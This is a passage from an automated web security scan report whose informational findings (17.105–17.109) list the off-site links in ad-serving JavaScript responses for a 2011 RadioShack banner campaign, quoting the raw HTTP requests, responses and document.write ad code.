document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=84449235=_4d4384fe,2477363337,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=84449235/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/682100952/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=682100952?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=682100952?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.105. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=806249011?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806249011/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806249011?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806249011/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806249011?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806249011/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=806249011?

Request

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806249011/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806249011?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806249011/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806249011?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806249011/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=806249011?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=806249011?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.106. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12754240401@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1824141209?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1824141209?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1824141209?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1824141209?

Request

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 23:08:31 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1824141209?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1824141209?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=69982493=_4d434c6f,2754240401,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=69982493/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1824141209/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1824141209?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1824141209?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.107. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1076249577?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1076249577/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1076249577?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1076249577/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1076249577?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1076249577/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1076249577?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/12831563331@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296271345

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:27:50 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1076249577/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1076249577?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1076249577/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1076249577?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=49427921=_4d438931,2831563331,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=49427921/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1076249577/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1076249577?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1076249577?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.108. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=838084819?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/838084819/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=838084819?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/838084819/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=838084819?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/838084819/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=838084819?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/13251816646@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296269250

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:59:03 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/838084819/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=838084819?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/838084819/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=838084819?">\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=80047564=_4d438276,3251816646,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=80047564/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/838084819/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=838084819?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=838084819?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.109. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b3.mookie1.com
Path:	/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90

Issue detail

The page was loaded from a URL containing a query string:

http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=

The response contains the following links to other domains:

http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1452529046?
http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1452529046?
http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1452529046?
http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1452529046?

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14152680175@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; session=1296256112|1296264723

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:36:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1452529046/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1452529046?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>\n');
document.write ('<SCRIPT language=');
document.write ("'");
